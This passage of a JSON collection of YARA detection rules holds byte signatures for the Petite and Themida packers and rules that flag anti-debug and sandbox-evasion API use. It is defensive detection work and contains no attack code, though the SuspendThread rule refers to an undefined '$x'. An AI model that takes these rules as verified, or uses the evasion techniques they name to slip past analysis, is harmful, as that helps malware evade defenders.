5F 5F 58 5A 8B 4A 0C C1 F9 02 33 C0 F3 AB 8B 4A 0C 83 E1 03 F3 AA 83 C2 10 EB 9E 45 52 52 4F 52 21 00 43 6F 72 72 75 70 74 20 44 61 74 61 21 00 8B 64 24 24 8B 04 24 83 C4 26 8B D0 66 81 C2 7E 01 6A 10 8B D8 66 05 77 01 50 52 6A 00 03 1B FF 13 6A FF FF 53 08 56 57 8B 7C 24 0C 8B 74 24 10 8B 4C 24 14 C1 F9 02 F3 A5 8B 4C 24 14 83 E1 03 F3 A4 5F 5E C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13_c1998_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }\r\n        $b = { 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_13_c1998_Ian_Luck_h: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 83 C7 68 81 C6 ?? ?? 00 00 F3 A5 FF D3 58 8D 90 B8 01 00 00 8B 0A 0F BA F1 1F 73 16 8B 04 24 FD 8B F0 8B F8 03 72 04 03 7A 08 F3 A5 83 C2 0C FC EB E2 83 C2 10 8B 5A F4 85 DB 74 D8 8B 04 24 8B 7A F8 03 F8 52 8D 34 01 EB 17 58 58 58 5A 74 C4 E9 1C FF FF FF 02 D2 75 07 8A 16 83 EE FF 12 D2 C3 81 FB 00 00 01 00 73 0E 68 60 C0 FF FF 68 60 FC FF FF B6 05 EB 22 81 FB 00 00 04 00 73 0E 68 80 81 FF FF 68 80 F9 FF FF B6 07 EB 0C 68 00 83 FF FF 68 00 FB FF FF B6 08 6A 00 32 D2 4B A4 33 C9 83 FB 00 7E A4 E8 AA FF FF FF 72 17 A4 30 5F FF 4B EB ED 41 E8 9B FF FF FF 13 C9 E8 94 FF FF FF 72 F2 C3 }\r\n        $b = { 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 72 04 03 7A 08 8B 0A F3 A5 83 C2 0C FC EB D4 8B 7A 08 03 F8 8B 5A 04 85 DB 74 13 52 53 57 03 02 50 E8 7B 00 00 00 85 C0 74 2E 5F 5F 58 5A 8B 4A 0C C1 F9 02 F3 AB 8B 4A 0C 83 E1 03 F3 AA 83 C2 10 EB A0 45 52 52 4F 52 21 00 43 6F 72 72 75 70 74 20 44 61 74 61 21 00 8B 64 24 24 8B 04 24 83 C4 26 8B D0 66 81 C2 6D 01 6A 10 8B D8 66 05 66 01 50 52 6A 00 8B 13 FF 14 1A 6A FF FF 93 ?? ?? 00 00 56 57 8B 7C 24 0C 8B 74 24 10 8B 4C 24 14 C1 F9 02 F3 A5 8B 4C 24 14 83 E1 03 F3 A4 5F 5E C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_v032a_fake_PEtite_21_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_c1998_99_Ian_Luck_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v21_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_PEtite_2x_level_0: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 27,
            "key": "yara_detect_possible_getforegroundwindow_evasion",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Possible_GetForegroundWindow_Evasion",
            "rule": "import \"pe\"\r\n \r\nrule UNPROTECT_Possible_GetForegroundWindow_Evasion\r\n{\r\n    meta:\r\n        description = \"Attempts to detect possible usage of sandbox evasion techniques using GetForegroundWindow API, based on module imports.\"\r\n        author = \"Kyle Cucci\"\r\n        date = \"2020-09-30\"\r\n \r\n    condition:\r\n        uint16(0) == 0x5A4D and\r\n        pe.imports(\"user32.dll\", \"GetForegroundWindow\") and\r\n        pe.imports(\"kernel32.dll\", \"Sleep\")\r\n}"
        },
        {
            "id": 80,
            "key": "yara_detect_rdtsc",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_RDTSC",
            "rule": "rule Detect_RDTSC: AntiDebug AntiSandbox{\r\n    meta: \r\n        description = \"Detect RDTSC as anti-debug and anti-sandbox\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = { 0F 31 }\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and $1\r\n}"
        },
        {
            "id": 66,
            "key": "yara_detect_setdebugfilterstate",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_SetDebugFilterState",
            "rule": "rule Detect_SetDebugFilterState: AntiDebug {\r\n    meta: \r\n        description = \"Detect SetDebugFilterState as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"NtSetDebugFilterState\" fullword ascii\r\n        $2 = \"DbgSetDebugFilterState\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them \r\n}"
        },
        {
            "id": 65,
            "key": "yara_detect_suspendthread",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_SuspendThread",
            "rule": "rule Detect_SuspendThread: AntiDebug {\r\n    meta: \r\n        description = \"Detect SuspendThread as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"SuspendThread\" fullword ascii\r\n        $2 = \"NtSuspendThread\" fullword ascii\r\n        $3 = \"OpenThread\" fullword ascii\r\n        $4 =\"SetThreadContext\" fullword ascii\r\n        $5 =\"SetInformationThread\" fullword ascii\r\n        $x1 =\"CreateToolHelp32Snapshot\" fullword ascii\r\n        $x2 =\"EnumWindows\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and $x and 2 of them \r\n}"
        },
        {
            "id": 105,
            "key": "yara_detect_themida",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Themida",
            "rule": "rule ThemidaWinLicense_V1X_Oreans_Technologies_SignByfly: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 43 4F 4D 43 54 4C 33 32 2E 64 6C 6C 00 00 00 49 6E 69 74 43 6F 6D 6D 6F 6E 43 6F 6E 74 72 6F 6C 73 00 00 00 00 00 00 }\r\n        $b = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19X_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9 }\r\n        $b = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_1201_compressed_Oreans_Technologies_h: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_18xx_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V10X_V17X_DLL_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19X_DLL_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_18xx_no_compression_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1820_p_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule themida_1005_httpwwworeanscom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_18xx_no_compression_Oreans_Technologies_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 }\r\n        $b = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ThemidaWinLicense_V2010_p_Hide_from_PE_scanners_Type2: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1201_compressed_Oreans_Technologies_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? 00 03 C7 B9 ?? ?? ?? 00 03 CF EB 0A B8 ?? ?? ?? ?? B9 5A ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 AF 01 00 00 02 00 00 00 91 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1X_NoCompression_SecureEngine_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V10X_V17X_DLL_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 ?? 89 48 01 61 E9 }\r\n        $b = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_Oreans_Technologies_2004: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1201_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 }\r\n        $b = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 11 02 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_Oreans_Technologies_2004_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_1800_compressed_engine_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1920_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 14 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V2100_p_Oreans_Technologies_20090917: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 EC 04 50 53 E8 ?? ?? 00 00 CC 58 8B D8 40 2D ?? ?? ?? ?? 2D ?? ?? ?? ?? 05 ?? ?? ?? ?? 80 3B CC 75 19 C6 03 00 BB 00 10 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 50 E8 0A 00 00 00 83 C0 00 89 44 24 08 5B 58 C3 55 8B EC 60 8B 75 08 8B 4D 0C C1 E9 02 8B 45 10 8B 5D 14 EB 08 31 06 01 1E 83 C6 04 49 0B C9 75 F4 61 C9 C2 10 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1820_p_Oreans_Technologies_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_v2018_c2007_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 EC 04 50 53 E8 00 00 00 00 58 8B D8 2D 00 ?? ?? 00 2D ?? ?? ?? 00 05 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule themida_1005_http58wwworeanscom: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1X_NoCompression_SecureEngine_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19Xnbsp_Oreans_Technologiesnbsp_nbsp_SignByfly: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 